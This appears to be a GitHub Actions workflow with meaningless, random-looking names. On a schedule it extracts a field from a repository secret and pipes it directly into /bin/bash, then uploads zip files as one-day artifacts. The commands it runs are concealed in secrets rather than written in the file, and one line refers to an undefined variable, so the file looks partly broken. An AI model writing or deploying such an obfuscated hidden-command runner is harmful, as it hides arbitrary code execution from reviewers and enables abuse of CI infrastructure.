name: drymonitor47
on:
  workflow_dispatch:

  schedule:
    - cron: '9 2,8,14,20 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: drymonitor47
        env:
          gjed6: ${{ secrets.gjed6 }}
        run: |
          printf '%s' "$gjed6" | jq -r .bwbin856 | /bin/bash
          printf '%s' "$lug2949" | jq -r .nz9474 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 5Zkm1eD7
          path: "*.zip"
          retention-days: 1
